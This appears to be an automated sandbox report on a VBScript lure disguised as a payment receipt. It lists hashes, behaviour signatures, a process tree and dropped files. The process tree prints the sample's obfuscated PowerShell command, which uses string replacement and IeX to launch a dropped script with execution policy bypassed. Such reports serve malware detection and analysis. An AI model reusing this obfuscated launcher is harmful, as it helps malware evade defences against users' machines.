Overview

overview

10

Static

static

928272_Pay...pt.vbs

windows7_x64

3

928272_Pay...pt.vbs

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    18-11-2021 19:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    928272_Payment_Receipt.vbs

  • Size

    2KB

  • MD5

    a19d14dd9f9fc40dcee050f211075042

  • SHA1

    2ee3f12297514b90e5c38045f52b3593c4439317

  • SHA256

    c793569980c9bf4b3d296903da942e9a11f4c6e2fb0023517a037fc3d56c1b36

  • SHA512

    a14aac7365e5305c47d726dd7980dcc5a8f714025e7dad4759ccc03ce1f657b31bda391933caf31ec305b532cb7dba7ca34ad7e59ff2971c30add90b554fc4b8

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\928272_Payment_Receipt.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1056

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    bbc60e95a1912ece77f9349e4f1dd849

    SHA1

    e0d60703a1864c57694a84d3188a3bdb72cafcc4

    SHA256

    b1bf9b1c830b965967dfb2fe9d795475585a9e4e9492d7b2716919021e7c5bba

    SHA512

    b9b7b5bbcb54d1f7e22cefe6e75a633cd6299016dd57d929ce1adebf5a622bcaf2c954e8453371d2f8571c4ca3b6ffb477651e0cb353c0a3d082b3d8327e4017

    Download Submit
  • C:\Users\Public\Downloads\HBar.ps1
    MD5

    8a43ee43aceb932ae16cd4fce2bc6166

    SHA1

    add161894bd58603f8cfe5de9d96d24670e653e8

    SHA256

    95a46df81c69a689c59907615108c3ff78734078c0555a260b504aab3ab41034

    SHA512

    a91342ef78f76eeac24ac79287703343483c3b728a3beb69345071545bccbf511744ce278863c6de8d345057452dbc7cd4ff583a8796e28199395e5af764c6f3

    Download Submit
  • memory/548-61-0x0000000002372000-0x0000000002374000-memory.dmp
    Filesize

    8KB

    Download
  • memory/548-58-0x000007FEF25D0000-0x000007FEF312D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/548-56-0x0000000000000000-mapping.dmp
    Download
  • memory/548-62-0x0000000002374000-0x0000000002377000-memory.dmp
    Filesize

    12KB

    Download
  • memory/548-60-0x0000000002370000-0x0000000002372000-memory.dmp
    Filesize

    8KB

    Download
  • memory/548-63-0x000000000237B000-0x000000000239A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1056-66-0x000007FEF25D0000-0x000007FEF312D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1056-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1056-69-0x0000000002AC2000-0x0000000002AC4000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1056-68-0x0000000002AC0000-0x0000000002AC2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1056-70-0x0000000002AC4000-0x0000000002AC7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1056-67-0x000000001B850000-0x000000001BB4F000-memory.dmp
    Filesize

    3.0MB

    Download
  • memory/1056-72-0x0000000002ACB000-0x0000000002AEA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1344-55-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp
    Filesize

    8KB

    Download